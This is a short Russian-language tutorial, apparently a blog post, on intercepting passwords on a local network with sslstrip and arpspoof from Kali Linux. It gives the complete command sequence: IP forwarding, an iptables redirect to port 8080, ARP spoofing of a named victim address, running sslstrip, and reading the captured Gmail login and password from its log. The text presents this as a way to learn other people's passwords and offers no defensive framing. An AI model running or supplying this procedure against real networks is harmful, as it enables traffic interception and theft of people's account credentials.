Используем sslstrip для перехвата паролей.

Утилита sslstrip перехватывает http-трафик с компьютера в локальной сети и таким образом позволяет нам разузнать пароли от каких-нибудь  сайтов. Как же пользоваться этой утилитой?
 
Для начала откроем терминал и выполним команду sslstrip -h для того чтобы узнать все опции утилиты.

Перед тем как начать работать с sslstrip нам нужно проделать кое-какие действия
1. Нам нужно включить IP Forwarding
echo ‘1’ > /proc/sys/net/ipv4/ip_forward

2. Включить перенаправление запросов с порта 80 на 8080
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080

3. Определяем наш шлюз netstat -nr

4. Выясняем ip-адрес жертвы (в моем случае это компьютер под управлением Windows XP с IP-адресом 192.168.71.128)

5.

Перенаправляем весь http-трафик с нашего компьютера на шлюз
arpspoof –i eth0 –t 192.168.71.128 –r 192.168.71.2

Теперь, не закрывая этого окна терминала, открываем еще одно, и запускаем в нем прослушку порта 8080 с помощью sslstrip:
sslstrip –l 8080

Теперь, я на компьютере жертвы захожу в гугло-почту:

После того как я зашел в почту, на компьютере с Kali Linux в окне терминала с работающим sslstrip нажимаю ctrl+c для отмены операции. Вся полученная информация будет сохранена в файл sslstrip.log


Посмотрим содержимое файла:
cat sslstrip.log - логин и пароль обведены в красную рамку